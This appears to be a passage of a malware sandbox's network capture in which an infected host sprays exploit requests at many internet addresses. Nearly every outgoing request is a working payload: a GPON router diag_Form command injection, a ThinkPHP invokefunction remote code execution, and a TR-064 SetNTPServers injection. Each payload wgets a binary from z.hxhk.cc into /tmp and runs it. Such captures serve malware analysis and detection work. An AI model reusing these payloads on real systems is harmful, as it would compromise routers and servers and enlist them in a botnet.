Mar 18, 2024 09:57:03.619611025 CET	298	OUT	POST /GponForm/diag_Form?images/ HTTP/1.1 User-Agent: Hello, World Accept: / Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 67 70 6f 6e 34 34 33 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 2b 67 34 34 33 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+g443`&ipv=0
Mar 18, 2024 09:57:07.817471981 CET	298	OUT	POST /GponForm/diag_Form?images/ HTTP/1.1 User-Agent: Hello, World Accept: / Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 67 70 6f 6e 34 34 33 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 2b 67 34 34 33 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+g443`&ipv=0
Mar 18, 2024 09:57:07.937757015 CET	500	IN	HTTP/1.1 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Mon, 18 Mar 2024 08:57:08 GMT Server: HTTP Server Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.23	53616	144.196.230.79	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:03.627937078 CET	310	OUT	POST /GponForm/diag_Form?images/ HTTP/1.1 User-Agent: Hello, World Accept: / Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 67 70 6f 6e 34 34 33 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 2b 67 34 34 33 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+g443`&ipv=0

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.23	40540	95.197.183.105	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:03.638180017 CET	320	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you
Mar 18, 2024 09:57:04.287820101 CET	320	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you
Mar 18, 2024 09:57:04.506279945 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Mon, 18 Mar 2024 08:57:04 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.23	52898	102.223.127.78	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:03.678208113 CET	298	OUT	POST /GponForm/diag_Form?images/ HTTP/1.1 User-Agent: Hello, World Accept: / Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 67 70 6f 6e 34 34 33 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 2b 67 34 34 33 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+g443`&ipv=0

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.23	51670	77.240.115.67	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:03.693239927 CET	310	OUT	POST /GponForm/diag_Form?images/ HTTP/1.1 User-Agent: Hello, World Accept: / Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 67 70 6f 6e 34 34 33 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 2b 67 34 34 33 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+g443`&ipv=0
Mar 18, 2024 09:57:03.888708115 CET	525	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 18 Mar 2024 08:57:02 GMT Connection: close Content-Length: 334 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 48 6f 73 74 6e 61 6d 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 68 6f 73 74 6e 61 6d 65 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid Hostname</h2><hr><p>HTTP Error 400. The request hostname is invalid.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.23	57538	24.209.204.179	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:03.776050091 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.23	35160	134.122.189.189	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:03.830113888 CET	310	OUT	POST /GponForm/diag_Form?images/ HTTP/1.1 User-Agent: Hello, World Accept: / Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 67 70 6f 6e 34 34 33 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 2b 67 34 34 33 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+g443`&ipv=0
Mar 18, 2024 09:57:04.162189960 CET	1286	IN	HTTP/1.1 400 Bad Request Date: Mon, 18 Mar 2024 08:57:04 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close ETag: "65e304c0-fde" Server: cdn-ddos-cc Data Raw: 66 64 65 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e e8 af b7 e6 b1 82 e6 97 a0 e6 95 88 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 73 74 79 6c 65 3e 0a 2a 2c 20 62 6f 64 79 2c 20 68 74 6d 6c 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 74 6d 6c 20 7b 0a 20 20 20 20 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 36 34 2c 36 34 2c 36 34 2c 76 61 72 28 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 29 29 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0a 20 20 20 20 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 67 72 61 79 73 63 61 6c 65 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 79 73 74 65 6d 2d 75 69 2c 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 41 72 69 61 6c 2c 4e 6f 74 6f 20 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 2c 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 Data Ascii: fde<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title></title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><style>*, body, html { margin: 0; padding: 0;}body, html { --text-opacity: 1; color: #404040; color: rgba(64,64,64,var(--text-opacity)); -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; font-family: system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji; font-size: 1
Mar 18, 2024 09:57:04.162265062 CET	1286	IN	Data Raw: 36 70 78 3b 0a 7d 0a 2a 20 7b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 7d 0a 68 74 6d 6c 5b 41 74 74 72 69 62 75 74 65 73 20 53 74 79 6c 65 5d 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 6c 6f 63 61 Data Ascii: 6px;}* { box-sizing: border-box;}html[Attributes Style] { -webkit-locale: "en-US";}.p-0 { padding: 0;}.w-240 { width: 60rem;}.antialiased { -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: gray
Mar 18, 2024 09:57:04.162338018 CET	1286	IN	Data Raw: 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 70 2d 30 22 3e 0a 20 20 20 20 20 20 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 6d 78 2d 61 75 74 6f 20 70 74 2d 31 30 20 6c 67 Data Ascii: <div id="cf-error-details" class="p-0"> <header class="mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased"> <h1 class="inline-block md:block mr-2 md:mb-2 font-light text-60 md:text-3xl text-black-dark leading-t
Mar 18, 2024 09:57:04.162410975 CET	458	IN	Data Raw: 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 77 68 61 74 5f 63 61 6e 5f 69 5f 64 6f 22 3e e5 a6 82 e4 bd 95 e8 a7 a3 e5 86 b3 3f 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e e5 8f af e4 bb a5 e8 81 94 e7 b3 bb e7 bd 91 e7 ab 99 Data Ascii: ata-translate="what_can_i_do">?</h2> <p></p> </div> </section> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-aut

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.23	58370	179.235.85.170	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:03.848581076 CET	735	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.23	45092	179.155.26.219	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:03.877250910 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.23	57588	24.209.204.179	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:03.897747993 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.23	42974	112.179.180.106	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:03.897847891 CET	320	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://z.hxhk.cc/sys64.x86 -O /tmp/.sys64; chmod 777 /tmp/.sys64; /tmp/.sys64 tp.s' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you
Mar 18, 2024 09:57:04.212730885 CET	35	IN	HTTP/1.0 301 Redirect
Mar 18, 2024 09:57:04.212791920 CET	377	IN	Data Raw: 44 61 74 65 3a 20 4d 6f 6e 20 4d 61 72 20 31 38 20 31 37 3a 35 37 3a 30 34 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 Data Ascii: Date: Mon Mar 18 17:57:04 2024Pragma: no-cacheCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: (null)Location: http://127.0.0.1:8899/login.asp<html><head></head><body>This document has moved to a new <a href="http://

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.23	58330	99.243.200.180	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:03.913803101 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.23	52514	34.236.132.177	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:03.927136898 CET	310	OUT	POST /GponForm/diag_Form?images/ HTTP/1.1 User-Agent: Hello, World Accept: / Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 67 70 6f 6e 34 34 33 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 2b 67 34 34 33 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://z.hxhk.cc/gpon443+-O+/tmp/gaf;sh+/tmp/gaf+g443`&ipv=0
